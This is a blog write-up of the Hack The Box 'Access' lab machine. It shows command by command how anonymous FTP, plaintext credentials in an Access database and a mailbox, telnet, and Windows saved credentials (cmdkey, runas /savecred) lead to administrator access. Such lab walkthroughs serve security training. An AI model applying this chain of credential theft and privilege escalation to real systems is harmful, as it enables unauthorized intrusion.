HTB Writeup: Access
Posted on Fri 01 February 2019 in Writeups
 |
OS | Windows |
| Author | egre55 | |
| Difficulty | Easy | |
| Points | 20 | |
| Released | 20-09-2018 | |
| IP | 10.10.10.98 |
Summary
Writeup of 20 points Hack The Box machine - Access. Clever Windows box that requires a lot of enumeration. User flag is to get after extracting unprivileged user credentials from Microsoft Access Database. Then, after using cached credentials, root flag (and access to privileged user) is unlocked.
Reconnaissance
Basic enumeration with nmap revealed only 3 opened ports - all TCP ones.
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
23/tcp open telnet Microsoft Windows XP telnetd (no more connections allowed)
80/tcp open http Microsoft IIS httpd 7.5
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
From banners I saw that all services introduce themselves as Windows programs.
Visitng http service gave me only view from some server room.
I checked another service - FTP - which allowed annonymous access (read only).
root@kali:~/HTB_machines/10.10.10.98# ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
226 Transfer complete.
ftp> cd Backups
250 CWD command successful.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 09:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 1.56 secs (3.4484 MB/s)
ftp> cd ../Engineer
250 CWD command successful.
ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18 01:16AM 10870 Access Control.zip
226 Transfer complete.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
150 Opening BINARY mode data connection.
226 Transfer complete.
10870 bytes received in 0.04 secs (249.7056 kB/s)
ftp> bye
221 Goodbye.
There were two directories available, containing two files: backup.mdb (Microsoft Access Database)
and Access Control.zip (ZIP file, password protected).
root@kali:~/HTB_machines/10.10.10.98# unzip Access\ Control.zip
Archive: Access Control.zip
skipping: Access Control.pst unsupported compression method 99
root@kali:~/HTB_machines/10.10.10.98# 7z l -slt Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,
4 CPUs Westmere E56xx/L56xx/X56xx (IBRS update) (206C1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Listing archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
----------
Path = Access Control.pst
Folder = -
Size = 271360
Packed Size = 10678
Modified = 2018-08-24 02:13:52
Created = 2018-08-24 01:44:57
Accessed = 2018-08-24 01:44:57
Attributes = A
Encrypted = +
Comment =
CRC = 1D60603C
Method = AES-256 Deflate
Host OS = FAT
Version = 20
Volume Index = 0
Exploitation
Password required to extract zip file was hidden in backup.mdb database. It could be obtained in at least two ways.
One is to use double bruteforce :) - dump all strings from db (since it wasn't encrypted nor especially large) and then try them as password.
The other approach was to read database, guess (quite obvious one) which table contained interesting data and try them as password
(much less tries - no need to automate). The perfect tool for fiddling with Microsoft Access Database files
is mdbtools.
root@kali:~/HTB_machines/10.10.10.98# mdb-tables backup.mdb
acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset
acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup
acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport
att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message
auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption
base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource
base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin
DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES
FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept
LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype
personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY
TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea
UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg
ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE
base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH
UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard
TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt
CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx
root@kali:~/HTB_machines/10.10.10.98# mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
root@kali:~/HTB_machines/10.10.10.98# 7z e -padmin Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,
4 CPUs Westmere E56xx/L56xx/X56xx (IBRS update) (206C1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
ERROR: Wrong password : Access Control.pst
Sub items Errors: 1
Archives with Errors: 1
Sub items Errors: 1
root@kali:~/HTB_machines/10.10.10.98# 7z e -paccess4u@security Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Westmere E56xx/L56xx/X56xx (IBRS update) (206C1),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
Would you like to replace the existing file:
Path: ./Access Control.pst
Size: 0 bytes
Modified: 2018-08-24 02:13:52
with the file from archive:
Path: Access Control.pst
Size: 271360 bytes (265 KiB)
Modified: 2018-08-24 02:13:52
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? Y
Everything is Ok
Size: 271360
Compressed: 10870
In the result I obtained Personal Storage Table - in other words - mail archive from Microsoft Outlook. In order to parse it on Linux I used another cool tool - libpst.
root@kali:~/HTB_machines/10.10.10.98# readpst -o Mails -D -j 4 -r -tea -u -w -m Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
root@kali:~/HTB_machines/10.10.10.98# ls Mails/Access\ Control/
2.eml 2.msg
root@kali:~/HTB_machines/10.10.10.98# cat Mails/Access\ Control/2.eml
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
(...)
Content-Type: text/plain; charset="utf-8"
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
(...)
It cointained some credetials. I checked if they were valid with telnet - they were. And from this account user flag was visible.
root@kali:~/HTB_machines/10.10.10.98# telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>type Desktop\user.txt
fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX8
Post exploitation
During this phase I run several checks (I really need to shape up my Windows skills), the usual stuff: checking services, installed programs, system known vulnerabilities. I even look through every .exe file present :). And finally at some point I issued the right command:
C:\Users\security>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
So cmdkey is a command present in Windows since Windows 2003 and allows to interact with stored credentials.
Privilege escalation
Knowing the attact vector I decided to list content of root.txt.
c:\xyz>runas /user:ACCESS\Administrator /env /savecred "cmd /c dir c:\users\Administrator\Desktop >c:\xyz\out""
c:\xyz>type out
Volume in drive C has no label.
Volume Serial Number is 9C45-DBF0
Directory of c:\users\Administrator\Desktop
08/25/2018 10:54 PM <DIR> .
08/25/2018 10:54 PM <DIR> ..
08/21/2018 11:07 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 16,715,423,744 bytes free
c:\xyz>runas /user:ACCESS\Administrator /env /savecred "cmd /c type c:\users\Administrator\Desktop\root.txt >c:\xyz\out""
c:\xyz>type out
6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXf
I similar way it is possible to run any other command as Administrator - for example reverse shell.
Voilà.